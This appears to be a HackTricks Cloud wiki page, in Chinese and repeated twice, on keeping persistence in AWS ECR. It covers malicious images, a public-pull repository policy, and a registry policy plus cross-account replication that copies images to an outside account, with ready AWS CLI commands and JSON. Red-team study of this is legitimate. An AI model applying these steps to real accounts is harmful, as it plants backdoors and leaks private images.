AWS - ECR Persistence

学习与实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习与实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 分享黑客技巧。

ECR

有关更多信息，请查看：

隐藏的带有恶意代码的 Docker 镜像

攻击者可以 将包含恶意代码的 Docker 镜像上传 到 ECR 存储库，并利用它在目标 AWS 账户中保持持久性。然后，攻击者可以以隐蔽的方式将恶意镜像部署到账户内的各种服务，例如 Amazon ECS 或 EKS。

存储库策略

向单个存储库添加策略，授予自己（或所有人）对存储库的访问权限：

aws ecr set-repository-policy \
--repository-name cluster-autoscaler \
--policy-text file:///tmp/my-policy.json

# With a .json such as

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

请注意，ECR要求用户通过IAM策略具有权限，以便在认证到注册表之前可以调用**ecr:GetAuthorizationToken** API，并从任何Amazon ECR存储库推送或拉取任何镜像。

注册表策略与跨账户复制

可以通过配置跨账户复制自动复制外部账户中的注册表，在那里您需要指明外部账户，以便复制注册表。

首先，您需要通过注册表策略授予外部账户对注册表的访问权限，例如：

aws ecr put-registry-policy --policy-text file://my-policy.json

# With a .json like:

{
"Sid": "asdasd",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::947247140022:root"
},
"Action": [
"ecr:CreateRepository",
"ecr:ReplicateImage"
],
"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}

然后应用复制配置：

aws ecr put-replication-configuration \
--replication-configuration file://replication-settings.json \
--region us-west-2

# Having the .json a content such as:
{
"rules": [{
"destinations": [{
"region": "destination_region",
"registryId": "destination_accountId"
}],
"repositoryFilters": [{
"filter": "repository_prefix_name",
"filterType": "PREFIX_MATCH"
}]
}]
}

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

PreviousAWS - EC2 Persistence NextAWS - ECS Persistence

Last updated 8 days ago

ECR

有关更多信息，请查看：

隐藏的带有恶意代码的 Docker 镜像

存储库策略

向单个存储库添加策略，授予自己（或所有人）对存储库的访问权限：

aws ecr set-repository-policy \
--repository-name cluster-autoscaler \
--policy-text file:///tmp/my-policy.json

# With a .json such as

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

请注意，ECR要求用户通过IAM策略具有权限，以便在认证到注册表之前可以调用**ecr:GetAuthorizationToken** API，并从任何Amazon ECR存储库推送或拉取任何镜像。

注册表策略与跨账户复制

可以通过配置跨账户复制自动复制外部账户中的注册表，在那里您需要指明外部账户，以便复制注册表。

首先，您需要通过注册表策略授予外部账户对注册表的访问权限，例如：

aws ecr put-registry-policy --policy-text file://my-policy.json

# With a .json like:

{
"Sid": "asdasd",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::947247140022:root"
},
"Action": [
"ecr:CreateRepository",
"ecr:ReplicateImage"
],
"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}

然后应用复制配置：

aws ecr put-replication-configuration \
--replication-configuration file://replication-settings.json \
--region us-west-2

# Having the .json a content such as:
{
"rules": [{
"destinations": [{
"region": "destination_region",
"registryId": "destination_accountId"
}],
"repositoryFilters": [{
"filter": "repository_prefix_name",
"filterType": "PREFIX_MATCH"
}]
}]
}